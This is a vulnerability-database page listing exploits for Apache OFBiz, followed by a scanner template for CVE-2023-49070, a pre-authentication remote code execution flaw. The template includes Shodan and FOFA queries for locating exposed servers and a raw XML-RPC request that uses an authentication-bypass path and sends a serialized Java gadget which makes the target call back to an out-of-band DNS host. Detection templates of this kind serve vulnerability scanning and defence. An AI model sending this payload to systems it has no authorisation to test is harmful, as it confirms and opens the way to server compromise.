| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
| Exploit for Code Injection in Apache Ofbiz | 2 Jan 202414:20 | – | githubexploit | |
| Exploit for Code Injection in Apache Ofbiz | 14 Dec 202309:32 | – | githubexploit | |
| Exploit for Code Injection in Apache Ofbiz | 17 Jan 202407:31 | – | githubexploit | |
| Exploit for Code Injection in Apache Ofbiz | 17 Dec 202322:56 | – | githubexploit | |
| Exploit for Server-Side Request Forgery in Apache Ofbiz | 13 Jan 202405:40 | – | githubexploit | |
| Exploit for Server-Side Request Forgery in Apache Ofbiz | 29 Dec 202315:01 | – | githubexploit | |
| Exploit for Server-Side Request Forgery in Apache Ofbiz | 13 Jan 202405:40 | – | githubexploit | |
| Exploit for Code Injection in Apache Ofbiz | 8 Jan 202403:13 | – | githubexploit | |
| Apache OFBiz 18.12.09 Remote Code Execution Exploit | 29 Dec 202300:00 | – | zdt | |
| CVE-2023-49070 | 5 Dec 202300:00 | – | attackerkb |
id: CVE-2023-49070
info:
name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution
author: your3cho
severity: critical
description: |
Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.
impact: |
Unauthenticated attackers can exploit unmaintained XML-RPC functionality to execute arbitrary code through Java deserialization, enabling complete server compromise.
remediation: Users are recommended to upgrade to version 18.12.10.
reference:
- https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
- https://seclists.org/oss-sec/2023/q4/257
- https://twitter.com/Siebene7/status/1731870759130427726
- https://nvd.nist.gov/vuln/detail/CVE-2023-49070
- https://issues.apache.org/jira/browse/OFBIZ-12812
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-49070
cwe-id: CWE-94
epss-score: 0.95442
epss-percentile: 0.99858
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: ofbiz
shodan-query:
- html:"OFBiz"
- http.html:"ofbiz"
- ofbiz.visitor=
fofa-query:
- app="Apache_OFBiz"
- body="ofbiz"
- app="apache_ofbiz"
tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce,vkev,vuln
http:
- raw:
- |
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0"?>
<methodCall>
<methodName>{{randstr}}</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- '<name>faultString</name>'
# digest: 490a0046304402201c84fddc8d57ead84d461ac5f678275e8dc1f2774a910fe6c527162418fd897f0220085280b8ef553579cbe1ac08f671b94ca6344c7d561d18ea431c1b0582c299ac:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation